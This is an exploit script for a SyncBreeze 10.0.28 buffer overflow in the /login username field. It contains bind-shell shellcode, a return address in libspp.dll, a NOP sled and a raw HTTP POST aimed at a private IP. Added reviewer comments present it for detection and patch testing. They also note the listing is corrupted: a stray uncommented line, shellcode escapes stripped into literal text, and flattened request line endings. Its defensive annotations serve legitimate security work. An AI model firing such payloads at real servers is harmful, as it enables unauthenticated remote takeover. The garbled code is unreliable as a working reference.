# Exploit Title: [SyncBreeze POST username overflow]
# Date: [30-Sep-2017]
# Exploit Author: [Owais Mehtab]
# Vendor Homepage: [http://www.syncbreeze.com]
# Software Link: [http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe]
# Version: [10.0.28]
# Tested on: [Windows 7]

#!/usr/bin/python
# NOTE(review): this shebang is not on line 1 of the file (the metadata header
# precedes it), so it has no effect when the file is executed directly.
#
# Proof-of-concept listing for the overflow described in the header: a POST to
# /login on SyncBreeze 10.0.28 with an oversized "username" form field.  Kept
# here for detection engineering and patch verification -- it shows exactly what
# the malicious request looks like on the wire.  As extracted, the file is not
# runnable (see the review notes below).
import socket
import os
import sys
# `os` and `sys` are imported but never referenced anywhere in this listing.

# Initial fuzzing pattern; superseded by the reassignment of `crash` further down.
crash = "A" * 1000
# jmp = 10 09 0c 83 libspp.dll
# bad char = 00 0A 0D 25 26 2B 3D
# The two comments above record the author's findings: an address inside
# libspp.dll (it reappears below in little-endian byte order) and the byte
# values the author found could not appear in the payload.

# NOTE(review): the next line is not commented out, so the interpreter rejects
# this file with a SyntaxError here and nothing below it ever executes.
bind shell on port 4444
# Payload, described by the author as a bind shell listening on TCP 4444.
# NOTE(review): the escape characters appear to have been lost in extraction --
# as written, these are literal ASCII strings such as "xb8x3b...", not raw
# bytes; confirm against the original listing.
buf = ""
buf += "xb8x3bxccxbexaaxdbxd2xd9x74x24xf4x5bx33"
buf += "xc9xb1x53x31x43x12x83xc3x04x03x78xc2x5c"
buf += "x5fx82x32x22xa0x7axc3x43x28x9fxf2x43x4e"
buf += "xd4xa5x73x04xb8x49xffx48x28xd9x8dx44x5f"
buf += "x6ax3bxb3x6ex6bx10x87xf1xefx6bxd4xd1xce"
buf += "xa3x29x10x16xd9xc0x40xcfx95x77x74x64xe3"
buf += "x4bxffx36xe5xcbx1cx8ex04xfdxb3x84x5exdd"
buf += "x32x48xebx54x2cx8dxd6x2fxc7x65xacxb1x01"
buf += "xb4x4dx1dx6cx78xbcx5fxa9xbfx5fx2axc3xc3"
buf += "xe2x2dx10xb9x38xbbx82x19xcax1bx6ex9bx1f"
buf += "xfdxe5x97xd4x89xa1xbbxebx5exdaxc0x60x61"
buf += "x0cx41x32x46x88x09xe0xe7x89xf7x47x17xc9"
buf += "x57x37xbdx82x7ax2cxccxc9x12x81xfdxf1xe2"
buf += "x8dx76x82xd0x12x2dx0cx59xdaxebxcbx9exf1"
buf += "x4cx43x61xfaxacx4axa6xaexfcxe4x0fxcfx96"
buf += "xf4xb0x1ax02xfcx17xf5x31x01xe7xa5xf5xa9"
buf += "x80xafxf9x96xb1xcfxd3xbfx5ax32xdcxaexc6"
buf += "xbbx3axbaxe6xedx95x52xc5xc9x2dxc5x36x38"
buf += "x06x61x7ex2ax91x8ex7fx78xb5x18xf4x6fx01"
buf += "x39x0bxbax21x2ex9cx30xa0x1dx3cx44xe9xf5"
buf += "xddxd7x76x05xabxcbx20x52xfcx3ax39x36x10"
buf += "x64x93x24xe9xf0xdcxecx36xc1xe3xedxbbx7d"
buf += "xc0xfdx05x7dx4cxa9xd9x28x1ax07x9cx82xec"
buf += "xf1x76x78xa7x95x0fxb2x78xe3x0fx9fx0ex0b"
buf += "xa1x76x57x34x0ex1fx5fx4dx72xbfxa0x84x36"
buf += "xcfxeax84x1fx58xb3x5dx22x05x44x88x61x30"
buf += "xc7x38x1axc7xd7x49x1fx83x5fxa2x6dx9cx35"
buf += "xc4xc2x9dx1f"


# Overflow payload as sent: 780 bytes of filler, the 4-byte libspp.dll address
# from the comment above (little-endian), 16 bytes of 0x90 (x86 NOP), then the
# shellcode.  Detection: a POST to /login whose username value is several
# hundred identical bytes followed by opaque binary-looking data is a
# high-fidelity signature for this attempt.
crash = "A" * 780 + "x83x0cx09x10" + "x90"*16 + buf

# Form body: the oversized username plus a one-character password.
fuzz="username="+crash+"&password=A"

# Hand-built HTTP/1.1 request.  NOTE(review): every header ends in a space and
# the header/body separator (`buffer+=" "`) is a single space -- the CRLF line
# terminators look like they were flattened during extraction; confirm against
# the original listing.  192.168.211.149 is a private (RFC 1918) address used as
# the target in the author's test.
buffer="POST /login HTTP/1.1 "
buffer+="Host: 192.168.211.149 "
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 "
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
buffer+="Accept-Language: en-US,en;q=0.5 "
buffer+="Referer: http://192.168.211.149/login "
buffer+="Connection: close "
buffer+="Content-Type: application/x-www-form-urlencoded "
buffer+="Content-Length: "+str(len(fuzz))+" "
buffer+=" "
buffer+=fuzz

# Plain TCP connection to port 80; the request is sent once, blind (no response
# is read), and the socket is closed.  The request needs no prior
# authentication, since /login is the target.  Mitigation: confirm with the
# vendor which build addresses this issue, keep the web interface off untrusted
# networks, and enforce a length limit on the username field at a reverse
# proxy/WAF as a compensating control until patched.
expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.211.149", 80))
expl.send(buffer)
expl.close()